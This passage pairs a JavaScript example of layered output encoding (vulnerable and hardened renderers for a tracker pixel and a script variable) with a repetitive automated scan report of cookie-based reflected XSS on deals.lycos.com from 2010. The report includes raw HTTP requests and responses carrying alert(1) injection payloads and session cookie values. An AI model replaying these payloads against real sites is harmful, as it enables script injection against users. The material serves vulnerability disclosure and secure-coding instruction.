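// sits inside a double-quoted src attribute, and a double-quoted JavaScript string.
// Each layer the value passes through gets its own encoder, applied innermost first.
// Renderer shapes are assumed from the report's snippets; the script one is reconstructed.

const ATTACK_ATTR = 'f7362"><script>alert(1)</script>5134e7589ce';
const ATTACK_JS = '22e54";alert(1)//ca2c7b2c015'; // the %3b has already been URL-decoded server-side

// For a double-quoted attribute value; only sufficient because the attribute IS quoted.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' }[c]));
}

// For a JavaScript string literal inside a <script> block: JSON.stringify escapes " \ and
// control characters; < > & and the line terminators U+2028/U+2029 are escaped too, so the
// literal can never contain </script> or break the JS parser.
function encodeForJsString(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g, c =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Vulnerable shapes, as seen in the report.
function renderTrackerPixel(cookie) {
  return `<img src="http://b.scorecardresearch.com/p?c1=2&c15=${cookie}&cj=1" alt="tracker" />`;
}
function renderScriptVar(cookie) {
  return `<script>var diktfc = "${cookie}";</script>`;
}

// Hardened shapes: URL-encode for the query string, then attribute-encode the whole URL;
// JS-string-encode (which supplies its own quotes) for the script block.
function renderTrackerPixelSafe(cookie) {
  const url = 'http://b.scorecardresearch.com/p?c1=2&c15=' + encodeURIComponent(cookie) + '&cj=1';
  return `<img src="${encodeForHtmlAttribute(url)}" alt="tracker" />`;
}
function renderScriptVarSafe(cookie) {
  return `<script>var diktfc = ${encodeForJsString(cookie)};</script>`;
}

// What a browser would send as c15: parse the src attribute back out of the markup, undo
// attribute encoding, then read the query parameter. A truncated value means the rest of
// the payload became markup.
function recoverC15(html) {
  const m = /src="([^"]*)"/.exec(html);
  if (!m) return null;
  const src = m[1].replace(/&quot;/g, '"').replace(/&#x27;/g, "'")
    .replace(/&lt;/g, '<').replace(/&gt;/g, '>').replace(/&amp;/g, '&');
  return new URL(src).searchParams.get('c15');
}

// What the script block does: run it with a stub alert() that records calls, and return
// the value diktfc ended up holding.
function runScriptBlock(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  if (!m) return null;
  const alerts = [];
  const value = new Function('alert', m[1] + '\nreturn diktfc;')(x => alerts.push(x));
  return { value, alerts };
}

console.log(renderTrackerPixelSafe(ATTACK_ATTR));
console.log(runScriptBlock(renderScriptVar(ATTACK_JS)), runScriptBlock(renderScriptVarSafe(ATTACK_JS)));
```

The order of the layers matters: the value is URL-encoded first because the browser decodes the query string last, and attribute-encoded second because the HTML parser decodes the attribute first. Applying only htmlspecialchars() to the raw cookie value would still leave a stray & or = free to reshape the tracker's query string.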
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f0b2"><script>alert(1)</script>781860d6eaf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c764"%3balert(1)//b75df22a01a was submitted in the diktfc cookie. This input was echoed as 2c764";alert(1)//b75df22a01a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2c764"%3balert(1)//b75df22a01a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17801
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c0"><script>alert(1)</script>d9b09df56e0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... "http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b10"%3balert(1)//c0968ffef2c was submitted in the diktfc cookie. This input was echoed as b3b10";alert(1)//c0968ffef2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b10"%3balert(1)//c0968ffef2c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18008
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db343"%3balert(1)//3b16844b478 was submitted in the diktfc cookie. This input was echoed as db343";alert(1)//3b16844b478 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adb343"%3balert(1)//3b16844b478; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15400
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4403f"><script>alert(1)</script>7f5d7171fd2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/panasonic-58-1080p-plasma-hdtv-1-100-414276 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15417
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-hdtv-1-100-414276&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4403f"><script>alert(1)</script>7f5d7171fd2&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4eee"%3balert(1)//c42f28c6d4b was submitted in the diktfc cookie. This input was echoed as f4eee";alert(1)//c42f28c6d4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af4eee"%3balert(1)//c42f28c6d4b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16317
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50667"><script>alert(1)</script>3e46c174419 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/panasonic-58-1080p-plasma-w-tivo-1-228-414295&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A50667"><script>alert(1)</script>3e46c174419&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8948a"%3balert(1)//0c42ac67901 was submitted in the diktfc cookie. This input was echoed as 8948a";alert(1)//0c42ac67901 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8948a"%3balert(1)//0c42ac67901; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18296
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d553c"><script>alert(1)</script>99f8fa73005 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/panasonic-dmc-zs6-12mp-camera-for-150-414700 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ttp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/panasonic-dmc-zs6-12mp-camera-for-150-414700&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad553c"><script>alert(1)</script>99f8fa73005&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16e3"><script>alert(1)</script>e618ca21634 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18856
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... p://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad16e3"><script>alert(1)</script>e618ca21634&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da3d"%3balert(1)//178fd7981ee was submitted in the diktfc cookie. This input was echoed as 3da3d";alert(1)//178fd7981ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/polaroid-dvf-720sc-sd-card-camcorder-50-414348 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3da3d"%3balert(1)//178fd7981ee; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18829
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea67"><script>alert(1)</script>5b7fd28b581 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/samsung-32-720p-lcd-hdtv-for-330-414355 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
